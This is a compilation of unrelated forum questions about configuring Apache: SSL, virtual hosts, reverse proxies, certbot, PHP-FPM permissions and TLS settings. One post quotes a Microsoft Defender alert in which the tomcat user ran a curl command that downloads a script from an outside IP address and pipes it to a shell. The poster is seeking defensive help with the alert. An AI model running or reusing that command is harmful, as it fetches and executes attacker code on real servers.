I am trying to configure SSL on an old opensuse server: openSUSE 11.4 (x86_64) VERSION = 11.4 CODENAME = Celadon I enabled the apache SSL module: apache2ctl -M Loaded Modules: core_module (static) mpm_prefork_module (static) http_module (static) so_module (static) actions_module (shared) alias_module (shared) auth_basic_module (shared) authn_file_module (shared) authz_host_module (shared) authz_groupfile_module (shared) authz_default_module (shared) authz_user_module (shared) autoindex_module (shared) cgi_module (shared) dir_module (shared) env_module (shared) expires_module (shared) include_module (shared) log_config_module (shared) mime_module (shared) negotiation_module (shared) setenvif_module (shared) ssl_module (shared) userdir_module (shared) php5_module (shared) reqtimeout_module (shared) deflate_module (shared) headers_module (shared) rewrite_module (shared) Syntax OK And configured the virtual host providing the SSL certificates (by copying and editing the vhost-ssl.template and renaming it https.xxxxxxxx.conf) and restarted apache. When I try to connect I get this error: openssl s_client -connect localhost:443 connect: Connection refused connect:errno=111 This is the openssl version installed: OpenSSL 1.0.1p 9 Jul 2015 (Library: OpenSSL 1.0.0c 2 Dec 2010) If it can help this is my iptables config: iptables -L -vn Chain INPUT (policy ACCEPT 4641 packets, 815K bytes) pkts bytes target prot opt in out source destination Chain FORWARD (policy ACCEPT 0 packets, 0 bytes) pkts bytes target prot opt in out source destination Chain OUTPUT (policy ACCEPT 1691 packets, 4745K bytes) pkts bytes target prot opt in out source destination Can you help me understand why I am not able to connect in localhost to the 443 port? EDIT: I believe it is a problem with apache and the additional https.xxxxxxx.conf file: httpd2 -S VirtualHost configuration: wildcard NameVirtualHosts and _default_ servers: *:80 is a NameVirtualHost default server xxxxxxxx.it (/etc/apache2/vhosts.d/xxxxxxxx.conf:3) port 80 namevhost xxxxxxxx.it (/etc/apache2/vhosts.d/xxxxxxxx.it.conf:3) port 80 namevhost XXX.XXX.XXX.XXX (/etc/apache2/vhosts.d/xxxxxxxx.it.conf:9) In my listen.conf it seems that if the SSL module is enabled it should Listen 443: Listen 80 Listen 443 This is the output of netstat: netstat -tulpn Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN 8105/mysqld tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 1847/sshd tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN 2179/master tcp 0 0 :::80 :::* LISTEN 13330/httpd2-prefor tcp 0 0 :::21 :::* LISTEN 1930/vsftpd tcp 0 0 :::22 :::* LISTEN 1847/sshd tcp 0 0 ::1:25 :::* LISTEN 2179/master I have modified the /etc/sysconfig/apache2 file to turn on the SSL module APACHE_SERVER_FLAGS="SSL" Now it seems to respond correctly bot locally and remotely: openssl s_client -connect localhost:443 CONNECTED(00000003) depth=3 C = SE, O = AddTrust AB, OU = AddTrust External TTP Network, CN = AddTrust External CA Root verify return:1 I still have problems since I get from the browser: This site can’t be reached xxxxxxxx.it unexpectedly closed the connection. Try: Checking the connection Checking the proxy and the firewall Running Network Diagnostics ERR_CONNECTION_CLOSED However I believe the problem is not related

I have a litle problem with my virtual host configuration on Apache2. Context : I have a Raspberry Pi with Apache2 installed. I want to access to my test directory in : "/var/www/html/test". So I modified my 000-default.conf in "/etc/apache2/sites-available" like this and this worked: ServerAdmin webmaster@localhost DocumentRoot /var/www/html ErrorLog ${APACHE_LOG_DIR}/error.log CustomLog ${APACHE_LOG_DIR}/access.log combined NameVirtualHost 192.168.1.29:80 ServerName raspyvan DocumentRoot /var/www/html/test # vim: syntax=apache ts=4 sw=4 sts=4 sr noet *(raspyvan is my servername on my router ans host file)* But I would deny the access with IP adress "192.168.1.29" So I modified in a second time my 000-default.conf file like this : Listen 192.168.1.29:80 ServerName DefaultServer DocumentRoot /var/www/html NameVirtualHost 192.168.1.29:80 ServerName 192.168.1.29 Deny from all ServerName raspyvan DocumentRoot /var/www/test # vim: syntax=apache ts=4 sw=4 sts=4 sr noet Now the problem is that the access by IP and hostname are denied and I don't know why. Edit : My nameserver is apply on the DNS router config and hosts apache file.

My server information is Server version: Apache/2.4.6 (CentOS) Server built: Nov 19 2015 21:43:13 I am trying to configure virtual host for 2 different sites: biz.example.com and pin.example.com which are hosted on the same server. There are 2 different folders located under 'var/www/html/' named 'biz' and 'pin' with their respected project files for the above mentioned 2 websites. I am trying to configure it on the below way. Within /etc/hosts below configuration 127.0.0.1 localhost localhost.localdomain localhost4 localhost4.localdomain4 ::1 localhost localhost.localdomain localhost6 localhost6.localdomain6 xxx.xxx.xxx.xxx biz.example.com xxx.xxx.xxx.xxx pin.example.com xxx.xxx.xxx.xxx is replaced by the server IP address. Within /etc/httpd/conf/httpd.conf IncludeOptional sites-enabled/*.conf Now, under /etc/httpd/sites-available there are biz.conf and pin.conf file. I also have the folder sites-enabled under /etc/httpd which has 2 files that points to the biz.conf and pin.conf of sites-available folder using the below command ln -s /etc/httpd/sites-available/biz.conf /etc/httpd/sites-enabled/biz.conf ln -s /etc/httpd/sites-available/pin.conf /etc/httpd/sites-enabled/pin.conf biz.conf has the followings ServerName http://biz.example.com/ ServerAlias http://biz.example.com/ DocumentRoot "/var/www/html/biz" Options Indexes FollowSymLinks AllowOverride all Order Deny,Allow Allow from 127.0.0.1 And the configuration within pin.conf file is mentioned as ServerName http://pin.example.com/ ServerAlias http://pin.example.com/ DocumentRoot "/var/www/html/pin" Options Indexes FollowSymLinks AllowOverride all Order Deny,Allow Allow from 127.0.0.1 On this setup, if i try to access http://biz.example.com/ , the correct website (biz website) is loading. But if i try to access http://pin.example.com/ , then also biz website is loading instead of pin website. Multiple configuration is not working together. I also tried to merge the virtual configuration of biz.conf and pin.conf within a single file, biz.conf, but it didn't work as well.

Server version: Apache/2.4.6 (CentOS) Server built: Nov 16 2020 16:18:20 When I go to browser and type IP/result I do not see all the files in directory. Alias /result "/var/geojson" Options +Indexes AllowOverride None Order allow,deny Allow from all Require all granted

I have a gitlab server next to my web server running on my home network. On my web server I run Apache2 with some domains. One of them is example.com. Now my aim is that the user receives the gitlab login page when visiting something like example.com/gitlab or gitlab.example.com. Actually I do not care whether the redirection happens from a certain url or a subdomain. I've already tried quite much but nothing of this worked for me (probably I did it wrong all times). I also read some related forum posts like - https://unix.stackexchange.com/questions/349218/use-apache-virtual-host-to-redirect-a-subdomain-to-internal-ip-preserving-passed - https://unix.stackexchange.com/questions/209300/use-apaches-name-based-virtual-host-to-redirect-to-internal-ip - https://www.linuxquestions.org/questions/linux-server-73/apache-redirect-to-internal-server-919321/ - ... But I didn't get anything up and running. My *default.conf* is configured that it always redirects Port 80 to Port 443 (HTTPS). ServerName example.com ServerAlias www.example.com Redirect permanent / https://www.example.com/ [...] So here is my *example.com.conf* before: ServerName example.com ServerAlias www.example.com DocumentRoot /var/www/html/example.com SSLEngine on SSLOptions +StdEnvVars SSLOptions +StdEnvVars Include /etc/letsencrypt/options-ssl-apache.conf SSLCertificateFile /etc/letsencrypt/live/www.example.com/fullchain.pem SSLCertificateKeyFile /etc/letsencrypt/live/www.example.com/privkey.pem First I tried to redirect **from a certain url**. I added: ProxyRequests Off ProxyPass /gitlab http://192.168.0.115:80/ ProxyPassReverse /gitlab http://192.168.0.115:80/ This does not work completly but if I enter the url, I get *"404 The requested URL /users/sign_in was not found on this server"*. '/users/sign_in' is the path of the login page of my gitlab so server, so at least something seems to work. Strange to me is that it works if I redirect the root directory to my internal IP: ProxyRequests Off ProxyPass / http://192.168.0.113:80/ ProxyPassReverse / http://192.168.0.113:80/ This works but now I can't access my actual website anymore. Then I tried redirection **from a subdomain**. I added: ServerName gitlab.example.com ProxyPass / http://192.168.0.113/ ProxyPassReverse / http://192.168.0.113/ But I receive *"The website is unreachable"*. I don't even get the subdomain running.

I have been following this install for LibreNMS https://www.linuxhelp.com/how-to-install-librenms-in-centos/ . Everything has been fine until I finally started the httpd service. It spits out this error. I have a virtual host configured. This is the exact Error message: > Could not reliably determine the server's fully qualified domain name using localhost.localdomain. Set the server name directive globally. I'll display the virtualhost in the httpd config file below. NameVirtualHost *:80 DocumentRoot /opt/librenms/html/ ServerName linuxhelp1.com CustomLog /opt/librenms/logs/access_log combined ErrorLog /opt/librenms/logs/error_log AllowEncodedSlashes On AllowOverride All Options FollowSymLinks MultiViews

During the koha installation process I told ubuntu to

sudo a2ensite library

and got the message

ERROR: Site library does not exist!

I looked it up and found here that I might have to [rename the file](https://stackoverflow.com/questions/20591889/site-does-not-exist-error-for-a2ensite) . So I used

sudo mv /etc/apache2/sites-available/library /etc/apache2/sites-available/library.conf

and got

mv: cannot stat '/etc/apache2/sites-available/library': No such file or directory

Any ideas how to solve the problem? I use ubuntu 22.04 for desktop.

I tried to configure SSL using this guide: https://www.digitalocean.com/community/tutorials/how-to-secure-apache-with-let-s-encrypt-on-ubuntu-22-04 But I get this error: serv_ivan@964889-cd87180:~$ sudo certbot --apache [sudo] password for serv_ivan: Saving debug log to /var/log/letsencrypt/letsencrypt.log Which names would you like to activate HTTPS for? - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 1: vardidze.ru 2: www.vardidze.ru - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Select the appropriate numbers separated by commas and/or spaces, or leave input blank to select all options shown (Enter 'c' to cancel): Requesting a certificate for vardidze.ru and www.vardidze.ru Certbot failed to authenticate some domains (authenticator: apache). The Certificate Authority reported these problems: Domain: vardidze.ru Type: unauthorized Detail: 94.228.120.106: Invalid response from http://vardidze.ru/.well-known/acme-challenge/3_vZwseS0tgfCsIJYvlU91atg-lEkdzvQZ58W-rJH98 : 403 Hint: The Certificate Authority failed to verify the temporary Apache configuration changes made by Certbot. Ensure that the listed domains point to this Apache server and that it is accessible from the internet. Some challenges have failed. Ask for help or search for solutions at https://community.letsencrypt.org . See the logfile /var/log/letsencrypt/letsencrypt.log or re-run Certbot with -v for more details. Although my domain is available: www.vardidze.ru Help me please.

I have a website which needs to be changed from Nginx to Apache webserver. The index directory is nl.html but the HTML extension is removed from the address bar. If I visit the website example.com it shows in the address bar the following URL: example.com/nl but actually it's nl.html. At the moment I have the following .htaccess

RewriteEngine On
RewriteCond %{REQUEST_URI} \.html$
RewriteRule ^(.*)\.html$ $1 [R=301,L]

When I visit the website the root URL is shown without the /nl. If I visit /nl/blog it shows a 404 but it should show /nl/blog.html the issue also appears on other files. What am I missing here?

I've just installed UFW 0.35 on Ubuntu 16.04: root@localhost:/etc# ufw --version ufw 0.35 Copyright 2008-2015 Canonical Ltd. and root@localhost:/etc# ufw app list Available applications: OpenSSH I would like to allow access to Apache on both port 80 and 443, with the command $ ufw allow "Apache Full" but I got an error ERROR: Could not find a profile matching 'Apache Full'

A CentOS 7 server hosts a public front end web site at example.com, and also hosts a backend API at home.example.com. The VirtualHost records below successfully direct requests for example.com to the front end while directing requests for the backend to home.example.com. However, requests for arbitrary requests to paths on example.com are given 404 errors. >**What specific changes need to be made to the VirtualHost config below so that requests to example.com/anyPath get redirected to example.com?** For example, a request for http://example.com/home that reaches the server should be returned with example.com Here is the VirtualHost: ServerName www.example.com ServerAlias example.com ErrorLog /var/log/httpd/example_com_error.log CustomLog /var/log/httpd/example_com_requests.log combined DocumentRoot /var/www/example/public_html ServerName home.example.com ErrorLog /var/log/httpd/example_home_com_error.log CustomLog /var/log/httpd/example_home_com_requests.log combined ProxyPass / http://public.ip.for.api:1234/ connectiontimeout=5 timeout=30

I am an Azure Consultant and I am getting Microsoft Defender for cloud "Suspicious process executed by a network service" alerts for CentOS Linux. Environment: Tomcat Apache running on CentOS Linux 7.9.0 The Defender alert details are as follows:

1/6/2024 9:11:14 PM 
  java -Djava.util.logging.config.file=/opt/tomcat/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djava.security.egd=file:///dev/urandom -Djava.awt.headless=true -Djdk.tls.ephemeralDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webresources -Dorg.apache.catalina.security.SecurityListener.UMASK=0027 -Xms512M -Xmx1024M -server -XX:+UseParallelGC -Dignore.endorsed.dirs= -classpath /opt/tomcat/bin/bootstrap.jar:/opt/tomcat/bin/tomcat-juli.jar -Dcatalina.base=/opt/tomcat -Dcatalina.home=/opt/tomcat -Djava.io.tmpdir=/opt/tomcat/temp org.apache.catalina.startup.Bootstrap start
Command line /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.372.b07-1.el7_9.x86_64/jre//bin/java -Djava.util.logging.config.file=/opt/tomcat/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djava.security.egd=file:///dev/urandom -Djava.awt.headless=true -Djdk.tls.ephemeralDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webresources -Dorg.apache.catalina.security.SecurityListener.UMASK=0027 -Xms512M -Xmx1024M -server -XX:+UseParallelGC -Dignore.endorsed.dirs= -classpath /opt/tomcat/bin/bootstrap.jar:/opt/tomcat/bin/tomcat-juli.jar -Dcatalina.base=/opt/tomcat -Dcatalina.home=/opt/tomcat -Djava.io.tmpdir=/opt/tomcat/temp org.apache.catalina.startup.Bootstrap start
Process id 7402
Image file path /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.372.b07-1.el7_9.x86_64/jre/bin/java
Image file SHA1 2bffb1d3d46365ca0e78f96577123814b54dbe88
Image file last modification time May 15, 2023 8:25:05 PM
Image file java
Effective user tomcat
1/6/2024 9:11:14 PM 
  bash /bin/sh -c "cd / ;curl -fsSL http://222.108.161.27:7070/docs/da.txt  |sh"
Command line /bin/sh -c "cd / ;curl -fsSL http://222.108.161.27:7070/docs/da.txt  |sh"
Process id 7402
Image file path /usr/bin/bash
Image file SHA1 9ad737cbd8bbdddc96726156dbd3bc03936bf02f
Image file last modification time Nov 24, 2021 10:03:27 PM
Mitre techniques T1505: Server Software Component, T1059: Command and Scripting Interpreter, T1059.004: Unix Shell, T1505.003: Web Shell, T1190: Exploit Public-Facing Application
Image file bash
Effective user tomcat
Referenced in commandline http://222.108.161.27:7070/docs/da.txt 
Referenced in commandline 222.108.161.27
1/6/2024 9:11:14 PM 
 bash was executed by a network service 'java'
Script content cd / ;curl -fsSL http://222.108.161.27:7070/docs/da.txt  |sh
Mitre techniques T1505: Server Software Component, T1059: Command and Scripting Interpreter, T1059.004: Unix Shell, T1505.003: Web Shell, T1190: Exploit Public-Facing Application
Suspicious process executed by a network service New Detected High

I need help understanding the above alert details. Is the process happening inside CentOS itself or is it suspicious activity?

root@technoluddites:/etc/apache2/sites-enabled# uname -a
Linux technoluddites.org 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64 GNU/Linux
root@technoluddites:/etc/apache2/sites-enabled# apachectl -v
Server version: Apache/2.4.38 (Debian)
Server built:   2019-10-15T19:53:42

I am trying to configure a site as a URL shortener. With exceptions, I am trying to get http://cjsh.name/foo to redirect to https://cjsh.name/?foo , and have an index.cgi that looks and sees if it has an entry for foo, and if not, redirect to https://cjshayward.com/foo . I tried to modify /index.cgi to log diagnostics to a file that isn't being opened; the beginning of /index.cgi reads:

#!/usr/bin/python

import cgi
import commands
import cPickle
import os
import re
import sys

ADMIN_URL = u'/wp-content/protected/refer_url.cgi'
CHARACTERS = \
  u'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234567890' + \
  u'=+/,!$*'
DEFAULT_LOCATION = u'https://CJSHayward.com/ '
DEBUG_LOG = u'/tmp/cjsh.name.error'
debug = open(DEBUG_LOG, 'w')

/tmp/cjsh.name.error is never being created, and an ls -ltu on the CGI script lists the time I last accessed the file from the command line, and not a time a few minutes later when I tried to load http://cjsh.name/pstv , which should hit a defined key in the dictionary and load https://cjshayward.com/positive/ . The HTTP site's Apache config file runs:

ServerAdmin cjshayward@pobox.com
        DocumentRoot /home/christos/books
        ServerName cjsh.name
        ServerAlias cjsh.cjshayward.com www.cjsh.name books.cjsh.name
        LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-agent}i\"" combined
        CustomLog /home/christos/logs/cjsh.name combined
        ErrorLog /home/christos/logs/cjsh.name.error
        RewriteEngine onhttps://www.zazzle.com/a_definion_of_the_autism_spectrum_t_shirt-235926361009257586  [R=301,L]
        RewriteRule ^/99.?[Pp][Aa][Gg][Ee].*$ https://smile.amazon.com/C-J-S-Hayward-Under-99-Pages/dp/B09H8SLCZP?_encoding=UTF8&qid=1632850210&sr=8-1&linkCode=ll1&tag=jonascorn-20&linkId=fffe9ae168e721fbc006f4096100e772&language=en_US&ref_=as_li_ss_tl  [R=301,L]
        RewriteRule ^/phone\/?\.?% https://www.amazon.com/How-Take-Life-Back-Phone/dp/B0BHS7LQJV/ref=sr_1_1?crid=C9EYO4DANH6I&keywords=cjs+hayward+how+can+i+take+my+life+back+from+my+phone&qid=1670093200&sprefix=cjs+hayward+how+can+i+take+my+life+back+from+my+phonCapsC115&sr=8-1%23editorialReviews_feature_div  [R=301,L]
        RewriteRule ^/([^\?].*)$ /?$1 [R=301,L]
        RewriteRule ^/$ https://cjshayward.com  [R=301,L]
        
            Options ExecCGI Indexes FollowSymLinks MultiViews
            AllowOverride None
            Order allow,deny
            allow from all

The HTTPS site's entry is:

ServerAdmin cjshayward@pobox.com
        DocumentRoot /home/christos/cjsh.name
        ServerName cjsh.name
        ServerAlias cjsh.cjshayward.com www.cjsh.name books.cjsh.name
        LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-agent}i\"" combined
        CustomLog /home/christos/logs/cjsh.name combined
        ErrorLog /home/christos/logs/cjsh.name.error
        RewriteEngine on
        RewriteRule ^/best.(.*)$ https://cjshayward.com/wp-content/cgi/download-ebook.cgi?book=The+Best+of+Jonathan%27s+Corner.$2  [R=301,L]
        RewriteRule ^/99.?[Pp][Aa][Gg][Ee].*$ https://smile.amazon.com/C-J-S-Hayward-Under-99-Pages/dp/B09H8SLCZP?_encoding=UTF8&qid=1632850210&sr=8-1&linkCode=ll1&tag=jonascorn-20&linkId=fffe9ae168e721fbc006f4096100e772&language=en_US&ref_=as_li_ss_tl  [R=301,L]
        RewriteRule ^/phone\/?\.?% https://www.amazon.com/How-Take-Life-Back-Phone/dp/B0BHS7LQJV/ref=sr_1_1?crid=C9EYO4DANH6I&keywords=cjs+hayward+how+can+i+take+my+life+back+from+my+phone&qid=1670093200&sprefix=cjs+hayward+how+can+i+take+my+life+back+from+my+phonCapsC115&sr=8-1%23editorialReviews_feature_div  [R=301,L]
        RewriteRule ^/([^\?].*)$ /?$1 [R=301,L]
        RewriteRule ^/$ https://cjshayward.com  [R=301,L]
        
            Options ExecCGI Indexes FollowSymLinks MultiViews
            AllowOverride None
            Order allow,deny
            allow from all
        
SSLCertificateFile /etc/letsencrypt/live/cjsh.name-0002/fullchain.pem
SSLCertificateKeyFile /etc/letsencrypt/live/cjsh.name-0002/privkey.pem
Include /etc/letsencrypt/options-ssl-apache.conf

In my main apache2.conf file I have:

DirectoryIndex index.cgi index.php index.shtml index.html

I am attempting to access the site via Firefox (119.0.1) on a Mac (12.6.9), and close all tabs to my site(s) and delete all browsing history forever to get a clean slate. Attempts to access http://cjsh.name/pstv are redirecting to https://cjshayward.com/?pstv (this is and should be a 404 page), and I have restarted Apache since touching the sites-enabled file. I also tried pulling http://cjsh.name/pstv for a first time from Safari, and Safari is behaving exactly like Firefox, i.e. redirecting to https://cjshayward.com/?pstv . How am I directing fresh calls to http://cjsh.name/pstv to https://cjshayward.com/?pstv (and https://cjsh.name/?pstv to https://cjshayward.com/?pstv) ? How should I be changing either or both of the Apache files or other setup so that the index.cgi is called, looks up the "right of the initial question mark" data, and redirects to (in this case) https://cjshayward.com/positive/ ? --UPDATE-- I shot myself in the foot by having cjsh.name ServerAliased in an earlier entry and that was producing the behavior I originally reported. However, the new difference in behavior is that trying to load http://cjsh.name/pstv loads https://cjshayward.com/?pstv instead of https://cjshayward.com/positive/ . That happens to load the homepage rather than a 404 at https://cjshayward.com/pstv , but it is still an error and my homepage does not load the page at https://cjshayward.com/positive/ . Thanks,

I'm trying to disable TLS 1.0/1.1 for PCI Compliance, but having problems. Running CentOS 7 / Apache 2.4.6 The Server is setup with multiple hosts. All the documentation I've found is similar but nothing seems to work. In /etc/httpd/conf.d (it currently has set) SSLProtocol all -SSLv2 -SSLv3 -TLSv1 -TLSv1.1 Also in the /etc/httpd/sitnamefqdn.conf (specific for the domain) SSLProtocol all -SSLv2 -SSLv3 -TLSv1 -TLSv1.1 And just because I've read this about letsencrypt (even though not active) /etc/letsencrypt/options-ssl-apache.conf SSLProtocol all -SSLv2 -SSLv3 -TLSv1 -TLSv1.1 I have restarted httpd, and rebooted just to make sure, nothing seems to take. If you use the site: https://www.ssllabs.com/ssltest I'm still getting.. This server is vulnerable to the POODLE attack. If possible, disable SSL 3 to mitigate. Grade capped to C. This server accepts RC4 cipher, but only with older protocols. Grade capped to B. This server does not support Forward Secrecy with the reference browsers. Grade capped to B. This server supports TLS 1.0 and TLS 1.1. Grade capped to B. Protocols TLS 1.3 No TLS 1.2 Yes TLS 1.1 Yes TLS 1.0 Yes SSL 3 INSECURE Yes SSL 2 No

I'm following this guide to create virtualhosts in my server, but my apache is running on CentOS 7, and I do not have the a2ensite command required at point 5. What's the equivalent centos command for the command the guide uses at point 5 ? sudo a2dissite 000-default.conf sudo a2ensite ostechnix1.lan.conf sudo a2ensite ostechnix2.lan.conf

What is the correct way to set up Apache virtualhosts and PHP-FPM pools with different users, one user per project, so that - each user/project is independent from each other in file access - projects using normal Apache / `www-data`, can not access the pooled projects? I have a set up where I'm using Apache with virtualhosts, and I want to set up each virtualhost with their own `php-fpm` pool: * Apache virtualhost `site1.conf`:

`

        DocumentRoot /var/www/site1/public

        
            Options Indexes FollowSymLinks
            AllowOverride All
            Require all granted
        

	
        # 2.4.10+ can proxy to unix socket
        SetHandler "proxy:unix:/run/php/php-fpm.site1.sock|fcgi://localhost/"

` * PHP pool for `site1`:

`
[site1]
user = site1
group = site1
listen.owner = site1
listen.group = www-data
listen.mode = 0660

` * The directory starting at `/var/www/site1`:

`
drwxr-xr-x 15 site1 site1 4,0K ago 31 11:48 .
drwxr-xr-x 15 site1 site1 4,0K ago 31 11:48 public

` * And the user:

`
id site1
uid=1007(site1) gid=1007(site1) grupos=1007(site1),33(www-data)

` Ditto other configuration files for virtualhost `site2`, changing where adequate. ---- Now, this configuration works and all files are served, but it's too open for what it's intended. For starters, the files and directories in the public area of `site1 have to be served with **world-readable** permission (eg.: rwxr--r-- site1 site1 file). If I make the file readable only for site1 as it should be, I get HTTP 403 and EACCESS` errors everywhere. I understand that at some point Apache has to have access to the files, but I thought the entire purpose of a FPM pool was to take care of that access. This also means that, unless project users set up their `umask` adequately, new files they create might not have the adequate permissions and they must be made world-readable by hand before the webserver (or FPM?) can access them. I thought that one potential solution would be to make `www-data user, which runs Apache, a member of site1 (site2`, etc...), but that would give other projects running on Apache full access to the project files anyway, including non-front facing elements such as Laravel config, backend connectors, etc. So in theory this doesn't work, A second option would be to set up each project's `public directory with either www-data setgid or with a read directive for ẁww-data via ACL (setfacl`) to make them readable by Apache's user specifically, but I'm not sure if that's doable without first giving Apache full path access to read the project, since in Linux a directory path is only readable if *all* its parent paths are. It could work, but I'm not entirely sure what is the corresponding setup. The only other option I could see would be to set up Apache itself so that the different virtualhosts are run with their own users, but I've found no usable documentation about such setups. The closest I've found is something called `apache2-mpm-itk` which advertises this capability, but I've found no usable configuration that actually lets an Apache service *start* while this module is enabled. In fact, the default configuration for itk in a Debian 9 machine right out segfaults Apache once started. What am I missing here to achieve the correct configuration? I take it it *has* to be possible, at least I assume that's how any normal web hoster does it.

What is the correct DNS configuration for multiple subdomain names, so that they will work with nginx server blocks and/or Apache virtual hosts? Example: Server IP Address: 192.0.2.0 Main/primary subdomain name: vegetable.example.com Other subdomain names to be served by this rig: - artichoke.example.com - bean.example.com - carrot.example.com How to properly configure the DNS records to work with Apache virtual hosts or nginx server blocks? - A record? - CNAME? - Alias?

My question is almost identical to Luis Machuca's from 2 years ago (Apache + php-fpm: Proper permissions for per-pool, per-user projects? ), but with some additional conditions. I have also configured the server (mine is an Ubuntu 22.04 machine) so that it is managed by Apache (v2.4.55) and php7.4-fpm. The current configuration allows every vhosts to be divided into specific php-fpm pools, and each of these pools running with different users. Everything works fine, but security related only to users to control permissions (or based on open_basedir) cannot stop shell_exec (which I need) from accessing, for example, configuration files inside /etc, or doing an ls -l /var/. What I would like, therefore, is a way to prevent a user from being able to go around and view linux's standard folders. I don't want to get to the point of making calls like:

setfacl -Rm u:user_site1:--- /;
setfacl -Rm d:u:user_site1:--- /;

and then authorizing each fundamental folder one by one. It seems too messy. I had therefore thought of using chroot inside each pool, but I was not able to do so because there was always a problem related to paths AH01071: Got error 'Primary script unknown', and all online solutions say to modify the ProxyPassMatch call based on port 9000, but I use SetHandler with sockets and I don't want to change this setting. What are the possible techniques? Do I really have to install SELinux? Below, I am adding my configurations to better understand the situation. /etc/apache2/sites-enabled/www.site.com.conf

Protocols h2 h2c http/1.1
	H2Direct on
	ServerAdmin server@site.com
	ServerName www.site.com
	DocumentRoot /var/www/vhosts/www.site.com/httpdocs
	ErrorLog /var/www/vhosts/www.site.com/log/error.log
	CustomLog /var/www/vhosts/www.site.com/log/access.log combined
	
		SetHandler "proxy:unix:/run/php/php7.4-fpm-www_site_com.sock|fcgi://localhost"
	


	Protocols h2 h2c http/1.1
		H2Direct on
		ServerAdmin server@site.com
		ServerName www.site.com
	DocumentRoot /var/www/vhosts/www.site.com/httpdocs
	ErrorLog /var/www/vhosts/www.site.com/log/error_ssl.log
	CustomLog /var/www/vhosts/www.site.com/log/access_ssl.log combined
	SSLEngine on
	SSLCertificateFile /etc/ssl/certs/www.site.com.crt
	SSLCertificateKeyFile   /etc/ssl/private/www.site.com.key
	
		SSLOptions +StdEnvVars
	
	
		SSLOptions +StdEnvVars
	
	
		SetHandler "proxy:unix:/run/php/php7.4-fpm-www_site_com.sock|fcgi://localhost"

/etc/php/7.4/fpm/php-fpm.conf

[global]
pid = /run/php/php7.4-fpm.pid
error_log = "syslog"
syslog.ident = php-fpm
include=/etc/php/7.4/fpm/pool.d/*.conf

/etc/php/7.4/fpm/pool.d/www_site_com.conf

[www.site.com]
user = user_site1
group = user_site1
listen = /run/php/php7.4-fpm-www_site_com.sock
listen.owner = user_site1
listen.group = www-data
pm = dynamic
pm.max_children = 5
pm.start_servers = 2
pm.min_spare_servers = 1
pm.max_spare_servers = 3

I was quite curious how does Apache web server can detect a subdomain even when all the subdomains point to same IP address, since my understanding is that an IP address that cannot have a subdomain, and every domain name ultimately resolve to an IP address. Example: example1.domain.com resolves to => 192.24.17.65 take you to => example1 webpage example2.domain.com resolves to => 192.24.17.65 take you to => example2 webpage

Systeminfos:

Ubuntu 22.04
KDE-Plasma-Version: 5.24.6
KDE-Frameworks-Version: 5.92.0
Qt-Version: 5.15.3
Kernel-Version: 5.15.0-10048-tuxedo (64-bit)
Apache 2.4.52

During a system cleanup, I seem to have uninstalled something that caused the following error to occur after a reboot.

The current theme cannot be loaded due to the errors below, please select another theme.
file///usr/share/sddm/breeze/main.qml: No such file or directory

In the terminal I then executed the following commands

sudo apt-get install --reinstall sddm-theme-breeze
sudo apt-get install --reinstall sddm
sudo dpkg-reconfigure sddm
sudo apt install --reinstall kde-plasma-desktop
sudo apt install --reinstall kde-standard

sudo systemctl unmask packagekit.service
sudo systemctl start packagekit.service
sudo systemctl unmask mysql.service
sudo systemctl unmask apache2.service

but mysql did not worked so i had to reinstall it
sudo apt-get --purge mysql*
sudo apt install --reinstall mysql
sudo apt install mysql-server

sudo chmod o+x $HOME

After that the login and the KDE desktop worked again. However, I now have a problem with the local web server. When I call a local page I get a 500 error in the browser. vhost

ServerName local.mydomain.de:443
        ServerAdmin webmaster@localhost

        DocumentRoot /home/user/_projects/mydomain/webroot/
        
                Options -Indexes +FollowSymLinks +MultiViews
                AllowOverride All
                Order allow,deny
                Allow from all
                Require all granted
        

        SSLEngine on
        SSLCertificateFile    /home/user/local.mydomain.de+3.pem
        SSLCertificateKeyFile /home/user/local.mydomain.de+3-key.pem

        ErrorLog /var/log/apache2/error-mydomain.log
        LogLevel warn
        CustomLog /var/log/apache2/access-mydomain.log combined
        ServerSignature Off

Checking the apache2 error.log gives me this message

[authz_core:error] [pid 8214] [client 127.0.0.1:41014] AH01630: client denied by server configuration: /home/user/_projects/

apache2: Syntax error on line 225 of /etc/apache2/apache2.conf: Could not open configuration file /etc/apache2/sites-enabled/mydomain.conf: Permission denied
Action '-M' failed

Now I can't figure out how to fix the problem.